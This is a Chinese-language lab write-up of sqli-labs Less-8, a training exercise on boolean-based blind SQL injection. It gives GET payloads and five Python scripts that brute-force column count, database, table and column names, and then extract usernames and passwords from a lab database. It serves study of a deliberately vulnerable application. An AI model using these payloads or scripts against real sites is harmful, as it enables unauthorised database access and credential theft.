Sqli-labs 复习 Less08 布尔型sql盲注 - GET

之前学习了一遍 sqli-labs，这是巩固复习一遍，代码全部手敲，加深印象

Sqli-labs 博客目录

布尔型 sql 盲注

Less-8 布尔型sql盲注-单引号

1. 测试

   payload

    ?id=1'or 1=1--+
   

   四种方法讲解：

   1. left()
   2. ascii()、substr()
   3. regexp
   4. ord()、mid()

   其中：

   1. left(string,2)=’sa’: string 的前两位为sa

   2. ascii(substr(string,2,1))=102: string的第二位开始的后一位的ascii码为102

   3. table_name regexp ‘^us[a-z]’：table_name 是以 us 为开头的

   4. ord(mid(string,2,1))=68: stringd的第二位开始的后一位的十六进制为68

2. 猜字段数

   ?id=1' order by 2--+
   
   ?id=1' order by 3--+
   
   ?id=1' order by 4--+
   

   运行脚本

   # -*- coding: utf-8 -*-
   # filename：Less08-1 field_num.py
   
   import hackhttp
   import re
   
   def field_num(arg):
       print "field_num start test..."
       for j in range(1,10):
           hh = hackhttp.hackhttp()
           msg = "1%27%20order%20by%20{j}--+".format(j=j)
           code, head, body, redirect_url, log = hh.http(arg+msg)   
           count = re.findall("You are in",body)
           if 'You are in' not in count:
               print "测试第%s位" % (j)
               break
   
       print "查询的字段数为: {j}".format(j=j-1)
   
   if __name__ == '__main__':
       field_num('http://10.10.10.137/sqli-labs/Less-8/?id=')
   

3. 猜数据库名

   ?id=1'and left(database(),1)='s'--+
   
   ?id=1'and left(database(),2)='se'--+
   
   ?id=1'and left(database(),3)='sec'--+
   

   运行脚本

   # -*- coding: utf-8 -*-
   # filename：Less08-2 database_name.py
   
   import hackhttp
   import re
   
   def database_name(arg):
       print "database_name start test..."
       payloads = list('abcdefghijklmnopqrstuvwxyz')
       name=""
   
       for k in range(1,2):
           for i in payloads:
               hh = hackhttp.hackhttp()
               msg = "1%27and%20left(database(),{k})=%27{i}%27--+".format(k=k,i=i)
               code, head, body, redirect_url, log = hh.http(arg+msg)            
               count = re.findall("You are in",body)
               if 'You are in' in count:
   
                   print "数据库的前段部分是%s" % (i)
                   break
               else:
                   print k
   
       for k in range(2,20):
           for j in payloads:
               hh = hackhttp.hackhttp()
               msg = "1%27and%20left(database(),{k})=%27{i}{j}%27--+".format(k=k,i=i,j=j)
               code, head, body, redirect_url, log = hh.http(arg+msg)            
               count = re.findall("You are in",body)
               if 'You are in' in count:
                   i+=j
                   print "数据库的前段部分是%s%s" % (i,j)
               else:
                   print k,i,j 
   
       print "数据库名为: {i}".format(i=i)
   
   if __name__ == '__main__':
       database_name('http://10.10.10.137/sqli-labs/Less-8/?id=')
   

4. 猜表名

   ?id=1’ and ascii(substr((select table_name from information_schema.tables where table_schema=’security’ limit 0,1),1,1))=101–+

   ?id=1’ and ascii(substr((select table_name from information_schema.tables where table_schema=’security’ limit 0,1),2,1))=109–+

   ?id=1’ and ascii(substr((select table_name from information_schema.tables where table_schema=’security’ limit 0,1),3,1))=97–+

   ?id=1’ and ascii(substr((select table_name from information_schema.tables where table_schema=’security’ limit 1,1),1,1))=114–+

   ?id=1’ and ascii(substr((select table_name from information_schema.tables where table_schema=’security’ limit 1,1),2,1))=101–+

   ?id=1’ and ascii(substr((select table_name from information_schema.tables where table_schema=’security’ limit 1,1),2,1))=102–+

   结果为： emails referers uagents users

   运行脚本

   # -*- coding: utf-8 -*-
   # filename：Less08-3 table_name.py
   
   import hackhttp
   import re
   
   def table_name(arg):
       print "table_name start test..."
       payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
       table_name=""
       database_name=""
       for k in range(5):
           for i in range(1,10):
               for j in range(65,122):
                   hh = hackhttp.hackhttp()
                   msg = "1%27%20and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%20{k},1),{i},1))={j}--+".format(k=k,i=i,j=j)
                   code, head, body, redirect_url, log = hh.http(arg+msg)            
                   count = re.findall("You are in",body)
                   if 'You are in' in count:
                       table_name+=chr(j)
                       #database_name+=str(k+1)
                       print "第%s个表的第%s位的ASCII码值是%s" % (k+1,i,j)
                       break
           table_name+=" "
       print "security 数据库的表名为: {table_name}".format(table_name=table_name)
   
   if __name__ == '__main__':
       table_name('http://10.10.10.137/sqli-labs/Less-8/?id=')
   

5. 猜列名

   ?id=1’ and 1=(select 1 from information_schema.columns where table_name=’users’ and column_name regexp ‘\^u’ limit 0,1)–+

   ?id=1’ and 1=(select 1 from information_schema.columns where table_name=’users’ and column_name regexp ‘\^us’ limit 0,1)–+

   ?id=1’ and 1=(select 1 from information_schema.columns where table_name=’users’ and column_name regexp ‘\^use’ limit 0,1)–+

   ?id=1’ and 1=(select 1 from information_schema.columns where table_name=’users’ and column_name regexp ‘\^username’ limit 0,1)–+

   结果为 id last password username

   运行脚本

   # -*- coding: utf-8 -*-
   # filename：Less08-4 column_name.py
   
   import hackhttp
   import re
   
   def column_name(arg):
       print "column_name start test..."
       payloads = list('abcdefghijklmnopqrstuvwxyz')
       payloads2 = list('abcdefghijklmnopqrstuvwxyz')
       name=""
   
       for k in range(0,5): # 假设5个表
           payloads2 = list('abcdefghijklmnopqrstuvwxyz')
           for y in range(26): # 每个列循环26遍列名首字母,确保考虑26个字母出现在列名首的可能性
               for i in payloads2: # 判断每一遍的列名首字母是不是在列表里
                   hh = hackhttp.hackhttp()
                   msg = "1%27%20and%201=(select%201%20from%20information_schema.columns%20where%20table_name=%27users%27%20and%20column_name%20regexp%20%27^{i}%27%20limit%20{k},1)--+".format(k=k,i=i)
                   code, head, body, redirect_url, log = hh.http(arg+msg)            
                   count = re.findall("You are in",body)
                   if 'You are in' in count:
                       print "第%s个列的第一位是%s" % (k,i)
                       payloads2.remove(i) # 查询到一次之后就将资格首字母从列表删掉
                       break
                   else:
                       print k,i
   
               if i == 'z':    # 
                   continue
   
               for x in range(0,10):
                   for j in payloads:
                       hh = hackhttp.hackhttp()
                       msg = "1%27%20and%201=(select%201%20from%20information_schema.columns%20where%20table_name=%27users%27%20and%20column_name%20regexp%20%27%5e{i}{j}%27%20limit%20{k},1)--+".format(i=i,j=j,k=k)
                       code, head, body, redirect_url, log = hh.http(arg+msg)            
                       count = re.findall("You are in",body)
                       if 'You are in' in count:
                           i+=j
                           print "第%s个列的列名是%s" % (k,i)
                       else:
                           print k,i,j 
   
               name = name+i+' '
           name = name+i+' | '
       print name
   
   if __name__ == '__main__':
       column_name('http://10.10.10.137/sqli-labs/Less-8/?id=')
   

6. 猜数据

   ifnull(expr1,expr2)，含义是：如果第一个参数不为空，则返回第一个参数，否则返回第二个参数。
   cast(字段名 as 转换的类型 )

   ?id=1’ and ord(mid((select ifnull(cast(username as char),0x20)from security.users order by id limit 0,1),1,1))=68–+

   结果为：

   username: Dumb  Angelina    Dummy   secure  stupid  superman    batman  admin   admin   admin   
   password: Dumb  Ikillyo pssword crappy  stupidity   genious moble   admin   admin   admin   
   

   运行脚本

   # -*- coding: utf-8 -*-
   # filename：Less08-5 data.py
   
   import hackhttp
   import re
   
   def data(arg):
       print "data start test..."
       payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.-+*/')
       payload2 = ['username','password']
       data="username: "
       for k in payload2:  # 两个列名
           for x in range(10): # 每个列假设十个数据
               for i in range(1,10):   # 每个数据的第i位的值匹配j
                   for j in range(65,122): # 
                       hh = hackhttp.hackhttp()
                       msg = "1%27%20and%20ord(mid((select%20ifnull(cast({k}%20as%20char),0x20)from%20security.users%20order%20by%20id%20limit%20{x},1),{i},1))={j}--+".format(k=k,x=x,i=i,j=j)
                       code, head, body, redirect_url, log = hh.http(arg+msg)            
                       count = re.findall("You are in",body)
                       if 'You are in' in count:
                           data+=chr(j)
                           print "%s列的第%s个数据的第%s位的ASCII码值是%s" % (k,x+1,i,j)
                           break
               data += "\t"
           print "{data}".format(data=data)
           data += "\npassword: "
   
   if __name__ == '__main__':
       data('http://10.10.10.137/sqli-labs/Less-8/?id=')